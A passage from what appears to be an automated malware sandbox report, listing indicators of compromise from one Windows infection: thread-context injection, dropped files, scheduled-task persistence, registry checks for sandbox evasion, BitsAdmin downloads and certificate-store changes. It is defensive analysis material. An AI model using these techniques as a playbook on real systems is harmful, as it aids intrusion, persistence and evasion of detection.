680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
9952	E825.exe
9952	E825.exe
9952	E825.exe
9952	E825.exe
9952	E825.exe
9952	E825.exe
9952	E825.exe
9952	E825.exe
9952	E825.exe
9952	E825.exe
9952	E825.exe
9952	E825.exe
9952	E825.exe
9952	E825.exe
9952	E825.exe

Suspicious use of SetThreadContext 14 IoCs

description	pid	Process	procid_target
PID 4236 set thread context of 5720	4236	WbmERcFQEVQ7I_1szGZicnPp.exe	169
PID 4992 set thread context of 5996	4992	f3TlIoxXFCq8uLyOWNVG6kec.exe	173
PID 4128 set thread context of 5872	4128	forfiles.exe	172
PID 2872 set thread context of 7044	2872	CG8V_S91oQwcEZwFvnLaOyJx.exe	211
PID 8056 set thread context of 8816	8056	A7iYL87VDgxih4QOUtGxPAp6.exe	300
PID 8392 set thread context of 8732	8392	tmp429_tmp.exe	314
PID 4508 set thread context of 6048	4508	svchost.exe	339
PID 9256 set thread context of 9876	9256	C249.exe	376
PID 9700 set thread context of 10072	9700	D610.exe	378
PID 8504 set thread context of 9468	8504	596B.exe	408
PID 8128 set thread context of 9300	8128	yoooduas.exe	440
PID 9300 set thread context of 8508	9300	svchost.exe	457
PID 9952 set thread context of 7544	9952	E825.exe	466
PID 6684 set thread context of 2724	6684	heirrsb	762

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	reg.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\libvlc.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\error_window.html	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Folder-48.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libhotkeys_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Audio-48.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsatip_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\favicon.ico	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\EHjpVGHxoTMU2\hbqkdmM.xml	QUcFAJV.exe
File created	C:\Program Files (x86)\RQzLvVUNU\vvYgNkR.xml	LuJlMYz.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\jamendo.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\extensions\VLSub.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libvod_rtsp_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	reg.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File created	C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\JjXhMvp.dll	LuJlMYz.exe
File created	C:\Program Files (x86)\nVgZiWyyyxUn\moQfFPb.dll	LuJlMYz.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Other-48.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libhttps_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\rwjuZze.xml	QUcFAJV.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsfsstorage_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\DOWaNXZtDJLiC\eVweovJ.dll	LuJlMYz.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac	autosubplayer.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_stl_plugin.dll	autosubplayer.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICF4B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID088.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{00CE1E75-E04C-4F83-824D-20B2297C955F}	msiexec.exe
File created	C:\Windows\Installer\91cf2.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI200F.tmp	msiexec.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\Installer\MSIDA4D.tmp	msiexec.exe
File opened for modification	C:\Windows\Tasks\YqJChhYnTMHzkMjCc.job	reg.exe
File opened for modification	C:\Windows\Installer\MSI295A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5F79.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Tasks\bvmcjEjDUxHOOxIZsK.job	svchost.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	Process not Found
File opened for modification	C:\Windows\Installer\MSI43C8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI46D6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5B01.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\Tasks\bvmcjEjDUxHOOxIZsK.job	reg.exe
File opened for modification	C:\Windows\Tasks\RulYNORIEfYpYdh.job	svchost.exe
File opened for modification	C:\Windows\Installer\MSI49A6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4A81.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID018.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3070.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Tasks\bvmcjEjDUxHOOxIZsK.job	schtasks.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI5812.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5EFB.tmp	msiexec.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\91cf2.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI428D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI42FC.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5756.tmp	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\Installer\91cf6.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID068.tmp	msiexec.exe
File created	C:\Windows\Tasks\RulYNORIEfYpYdh.job	Conhost.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Tasks\RulYNORIEfYpYdh.job	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\Installer\91cf6.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID038.tmp	msiexec.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\Installer\MSI2436.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2DFE.tmp	msiexec.exe
File created	C:\Windows\Installer\91cf5.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6576.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\Tasks\YqJChhYnTMHzkMjCc.job	svchost.exe
File opened for modification	C:\Windows\Installer\MSI2736.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICFF8.tmp	msiexec.exe
File created	C:\Windows\Tasks\YqJChhYnTMHzkMjCc.job	reg.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 9 IoCs

pid	pid_target	Process	procid_target
5012	1140	WerFault.exe	89
4880	5068	WerFault.exe	132
5948	5068	WerFault.exe	132
6768	5068	WerFault.exe	132
7124	5068	WerFault.exe	132
7152	2872	WerFault.exe	147
2156	972	WerFault.exe	140
1236	5068	WerFault.exe	132
4868	5068	WerFault.exe	132

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	reg.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	C249.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	heirrsb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f3TlIoxXFCq8uLyOWNVG6kec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	C249.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gbirrsb
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gbirrsb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu0299d0d70a4d322.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu0299d0d70a4d322.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu0299d0d70a4d322.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f3TlIoxXFCq8uLyOWNVG6kec.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	C249.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	f3TlIoxXFCq8uLyOWNVG6kec.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gbirrsb
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	heirrsb
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	heirrsb

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	6IFGlk_zgPccCvwWf2NC4b1f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	P8lHA4JfehFIKYBi0B67dfom.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	6IFGlk_zgPccCvwWf2NC4b1f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	P8lHA4JfehFIKYBi0B67dfom.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe

Creates scheduled task(s) 1 TTPs 25 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
9220	schtasks.exe
9664	schtasks.exe
5740	schtasks.exe
6240	schtasks.exe
752	schtasks.exe
6628	schtasks.exe
6012	schtasks.exe
8592	schtasks.exe
3152	schtasks.exe
7336	schtasks.exe
9748	schtasks.exe
5136	schtasks.exe
5524	schtasks.exe
8128	schtasks.exe
10080	schtasks.exe
7264	schtasks.exe
9764	schtasks.exe
10224	schtasks.exe
9892	schtasks.exe
5860	schtasks.exe
5552	schtasks.exe
9752	schtasks.exe
3076	schtasks.exe
5912	schtasks.exe
10200	schtasks.exe

Delays execution with timeout.exe 5 IoCs

evasion

pid	Process
6096	timeout.exe
5312	timeout.exe
7940	timeout.exe
6348	timeout.exe
8636	timeout.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
8844	bitsadmin.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Kills process with taskkill 8 IoCs

evasion

pid	Process
8596	taskkill.exe
8588	taskkill.exe
8636	taskkill.exe
7860	taskkill.exe
6856	taskkill.exe
5224	taskkill.exe
4656	taskkill.exe
5136	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 14 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\International\CpMRU	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	FiuyNOb.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	FiuyNOb.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Size = "10"	mshta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Factor = "20"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Enable = "1"	mshta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	BQGoqtZ.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	BQGoqtZ.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	forfiles.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	LuJlMYz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5ad12640-0000-0000-0000-500600000000}	LuJlMYz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	QUcFAJV.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	LuJlMYz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	forfiles.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	LuJlMYz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	kIvrhCZ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	QUcFAJV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{TKR9TRJ3-XT3I-VY52-597M-MXZ27DTVMS64}	Conhost.exe
